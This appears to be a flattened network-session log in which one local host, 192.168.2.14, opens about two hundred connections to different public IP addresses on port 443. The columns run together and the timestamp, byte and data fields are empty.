                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13519192.168.2.1459560101.54.156.154443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13520192.168.2.145932850.170.103.59443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13521192.168.2.1446862202.184.38.206443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13522192.168.2.1458046107.73.179.30443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13523192.168.2.1458204141.82.195.104443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13524192.168.2.143693212.213.13.238443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13525192.168.2.1444760190.196.231.205443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13526192.168.2.1443884173.193.217.174443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13527192.168.2.144650295.242.172.35443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13528192.168.2.1442396179.33.119.247443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13529192.168.2.1456898104.122.217.49443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13530192.168.2.146013047.123.165.8443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13531192.168.2.145437432.181.216.164443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13532192.168.2.1457984163.138.238.12443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13533192.168.2.1454452205.51.23.212443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13534192.168.2.1438324157.17.232.175443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13535192.168.2.144967219.36.178.41443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13536192.168.2.1448804130.251.142.72443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13537192.168.2.1444094168.113.172.98443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13538192.168.2.1441502180.128.48.130443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13539192.168.2.1460912109.72.50.113443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13540192.168.2.1460344180.123.252.108443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13541192.168.2.1437296193.13.15.159443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13542192.168.2.1449820168.225.122.136443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13543192.168.2.14420484.204.19.103443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13544192.168.2.143603445.102.17.22443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13545192.168.2.1442640119.58.1.27443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13546192.168.2.1437616104.16.182.134443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13547192.168.2.144893098.211.168.105443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13548192.168.2.1458452153.41.214.164443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13549192.168.2.1455682142.202.100.180443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13550192.168.2.1451228124.75.63.137443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13551192.168.2.1440086221.226.190.124443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13552192.168.2.1451944142.23.49.146443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13553192.168.2.1447626175.86.165.251443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13554192.168.2.1433706191.78.10.197443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13555192.168.2.1456838162.83.42.8443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13556192.168.2.1449588162.255.38.213443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13557192.168.2.1453354135.185.201.136443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13558192.168.2.145261490.65.55.153443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13559192.168.2.143335241.165.97.88443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13560192.168.2.14487981.214.187.106443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13561192.168.2.1439448202.52.23.18443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13562192.168.2.145432458.140.15.178443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13563192.168.2.144719074.238.226.11443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13564192.168.2.1434568206.208.25.107443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13565192.168.2.1444304101.112.77.22443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13566192.168.2.1451394141.176.225.179443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13567192.168.2.143304473.226.139.206443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13568192.168.2.1435490208.218.227.8443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13569192.168.2.1441106211.190.235.47443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13570192.168.2.144383447.75.157.97443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13571192.168.2.145203625.113.111.63443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13572192.168.2.1457942183.16.50.203443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13573192.168.2.1442198146.126.196.192443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13574192.168.2.145172619.187.135.52443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13575192.168.2.1447550136.175.75.81443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13576192.168.2.1449060186.80.11.106443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13577192.168.2.1447302149.248.159.44443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13578192.168.2.1450656132.238.202.150443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13579192.168.2.1437722160.47.253.143443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13580192.168.2.143940666.109.132.228443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13581192.168.2.1454592180.194.217.86443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13582192.168.2.143642854.103.189.162443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13583192.168.2.143464262.88.187.16443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13584192.168.2.1434584123.72.198.78443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13585192.168.2.1448382198.176.144.70443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13586192.168.2.1455424222.20.124.10443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13587192.168.2.1459354195.87.2.41443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13588192.168.2.1441630172.15.127.157443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13589192.168.2.1434748166.185.243.201443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13590192.168.2.1449170159.128.219.184443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13591192.168.2.1448956149.234.229.8443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13592192.168.2.145793077.197.38.215443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13593192.168.2.143732086.23.167.205443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13594192.168.2.145473695.121.16.194443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13595192.168.2.1445476132.121.169.219443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13596192.168.2.1444954181.14.198.77443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13597192.168.2.1440878168.38.8.199443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13598192.168.2.143561099.158.252.254443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13599192.168.2.1456560133.68.68.78443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13600192.168.2.1449906104.16.105.92443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13601192.168.2.143371441.237.241.242443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13602192.168.2.145813652.141.190.198443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13603192.168.2.1454444173.253.5.199443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13604192.168.2.145231681.96.57.105443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13605192.168.2.1448520201.246.173.32443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13606192.168.2.1444866131.177.122.203443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13607192.168.2.1456766183.110.222.61443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13608192.168.2.145631648.8.144.167443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13609192.168.2.1436878167.247.117.143443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13610192.168.2.145300259.11.86.65443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13611192.168.2.1459138141.226.122.212443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13612192.168.2.143769440.198.117.247443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13613192.168.2.144572039.123.103.243443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13614192.168.2.1446522112.242.161.78443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13615192.168.2.1440436106.32.180.49443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13616192.168.2.1450568159.119.218.213443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13617192.168.2.144826054.179.127.179443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13618192.168.2.1451474198.194.150.199443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13619192.168.2.1450834221.206.209.198443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13620192.168.2.1454970104.18.61.4443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13621192.168.2.1455790103.202.220.173443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13622192.168.2.144159477.95.78.56443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13623192.168.2.1436854165.57.254.241443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13624192.168.2.1459086189.72.52.180443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13625192.168.2.1455216194.244.190.109443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13626192.168.2.145791297.184.88.237443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13627192.168.2.1450120117.41.97.202443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13628192.168.2.145332878.149.152.228443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13629192.168.2.1446190185.14.13.16443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13630192.168.2.144580631.206.130.143443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13631192.168.2.144152866.7.62.110443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13632192.168.2.1449298175.205.207.188443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13633192.168.2.1447374122.13.182.193443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13634192.168.2.143552036.27.155.107443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13635192.168.2.143882844.83.155.44443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13636192.168.2.1443742118.37.26.99443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13637192.168.2.1451216149.218.252.105443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13638192.168.2.145318075.11.184.173443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13639192.168.2.1453538216.194.5.91443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13640192.168.2.145879858.12.136.60443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13641192.168.2.1438628206.164.103.103443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13642192.168.2.1434158184.233.134.25443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13643192.168.2.143612890.111.240.172443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13644192.168.2.1439576196.189.42.100443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13645192.168.2.1450396113.19.214.251443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13646192.168.2.143840854.68.134.125443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13647192.168.2.1449644108.151.9.157443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13648192.168.2.1445332211.22.225.6443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13649192.168.2.1445880144.12.33.237443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13650192.168.2.144485446.10.136.224443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13651192.168.2.1445908149.228.132.3443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13652192.168.2.1445528213.216.35.175443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13653192.168.2.144406258.98.195.199443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13654192.168.2.1459152205.167.253.66443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13655192.168.2.144557069.136.169.196443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13656192.168.2.1439080159.87.2.11443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13657192.168.2.1449476113.131.155.30443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13658192.168.2.1457944201.217.178.248443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13659192.168.2.14517164.196.147.225443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13660192.168.2.1460506123.85.186.125443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13661192.168.2.143364696.213.74.186443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13662192.168.2.1438156179.149.38.167443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13663192.168.2.144696874.201.244.31443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13664192.168.2.1460290164.84.115.94443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13665192.168.2.1436402129.227.244.68443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13666192.168.2.1457924208.252.1.52443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13667192.168.2.1434050190.84.28.63443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13668192.168.2.144048496.194.96.132443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13669192.168.2.1435704108.193.95.4443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13670192.168.2.1450156209.32.62.219443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13671192.168.2.1434554176.72.174.3443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13672192.168.2.1450108185.185.237.164443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13673192.168.2.1440696118.213.193.26443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13674192.168.2.1444308206.135.115.86443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13675192.168.2.1447682196.239.4.187443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13676192.168.2.1454574139.22.215.201443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13677192.168.2.1455000194.238.97.43443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13678192.168.2.145169692.133.26.168443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13679192.168.2.1443864221.16.173.0443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13680192.168.2.144974657.44.199.76443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13681192.168.2.1451570137.142.75.171443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13682192.168.2.1439852210.245.137.89443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13683192.168.2.1457504107.157.194.88443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13684192.168.2.144848449.140.70.119443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13685192.168.2.144397078.177.124.189443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13686192.168.2.1439414155.239.145.30443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13687192.168.2.145477254.194.138.33443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13688192.168.2.145390699.132.99.20443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13689192.168.2.14357825.202.107.67443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13690192.168.2.144797017.105.180.90443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13691192.168.2.1460376218.153.114.50443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13692192.168.2.1440226193.8.253.140443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13693192.168.2.1457826105.34.40.23443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13694192.168.2.1443774142.27.9.239443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13695192.168.2.1435342111.13.228.158443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13696192.168.2.14557182.104.201.79443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13697192.168.2.1433494167.122.76.213443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13698192.168.2.1440690148.182.121.224443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13699192.168.2.143905093.205.196.227443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13700192.168.2.145691043.220.193.190443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13701192.168.2.143859024.209.185.206443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13702192.168.2.145173069.83.22.15443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13703192.168.2.1443750179.116.27.51443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13704192.168.2.1436432173.10.22.66443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13705192.168.2.146090819.116.127.54443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13706192.168.2.144950098.225.90.190443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13707192.168.2.143713072.139.165.141443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13708192.168.2.145958260.193.249.218443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13709192.168.2.1443764101.195.99.171443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13710192.168.2.1440674181.62.148.92443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13711192.168.2.1457130180.238.228.25443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13712192.168.2.1460156191.112.106.161443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13713192.168.2.1440942212.42.220.113443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13714192.168.2.145787482.163.156.59443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13715192.168.2.1445694177.218.108.46443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13716192.168.2.145315277.198.119.114443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13717192.168.2.145839825.38.79.91443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13718192.168.2.144750850.44.140.196443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13719192.168.2.1454056108.148.88.82443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13720192.168.2.145885875.111.196.241443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13721192.168.2.1437978137.103.225.66443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13722192.168.2.1439598117.131.160.159443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13723192.168.2.1444652122.127.182.35443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13724192.168.2.145486259.6.92.86443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13725192.168.2.143386057.58.232.34443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13726192.168.2.144301250.210.21.141443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13727192.168.2.1448204118.92.226.193443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13728192.168.2.1448786153.98.108.13443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13729192.168.2.145149624.11.180.140443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13730192.168.2.1446232154.199.84.9443
                                                        TimestampBytes transferredDirectionData


